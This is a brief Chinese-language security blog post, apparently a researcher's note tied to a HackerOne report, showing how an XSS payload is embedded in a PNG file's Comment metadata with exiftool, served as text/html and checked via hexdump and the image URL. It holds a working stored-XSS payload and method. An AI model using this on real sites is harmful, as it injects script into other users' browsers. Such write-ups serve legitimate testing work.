PNG IDAT 塊中的 XSS payload

sec875發表於2024-08-01

https://hackerone.com/reports/964550

在已有的1.png檔案里加入payload
exiftool -Comment="\"><script>alert(prompt('XSS BY sec875'))</script>" 1.png

修改
Content-Type: text/html

檢視bin
hexdump -C 1.png 

訪問圖片地址進行驗證

相關文章